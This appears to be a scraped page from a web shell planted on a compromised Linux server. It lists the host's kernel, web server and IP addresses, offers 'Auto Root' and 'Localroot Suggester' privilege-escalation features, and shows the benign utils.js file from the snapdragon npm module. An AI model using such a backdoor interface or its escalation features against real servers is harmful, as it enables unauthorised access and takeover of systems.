Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.143.215.114
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
snapdragon /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
compiler.js
3.51
KB
-rw-rw-r--
2022-08-30 11:49
parser.js
10.84
KB
-rw-rw-r--
2022-08-30 11:49
position.js
320
B
-rw-rw-r--
2022-08-30 11:49
source-maps.js
3.52
KB
-rw-rw-r--
2022-08-30 11:49
utils.js
888
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
'use strict'; /** * Module dependencies */ exports.extend = require('extend-shallow'); exports.SourceMap = require('source-map'); exports.sourceMapResolve = require('source-map-resolve'); /** * Convert backslash in the given string to forward slashes */ exports.unixify = function(fp) { return fp.split(/\\+/).join('/'); }; /** * Return true if `val` is a non-empty string * * @param {String} `str` * @return {Boolean} */ exports.isString = function(str) { return str && typeof str === 'string'; }; /** * Cast `val` to an array * @return {Array} */ exports.arrayify = function(val) { if (typeof val === 'string') return [val]; return val ? (Array.isArray(val) ? val : [val]) : []; }; /** * Get the last `n` element from the given `array` * @param {Array} `array` * @return {*} */ exports.last = function(arr, n) { return arr[arr.length - (n || 1)]; };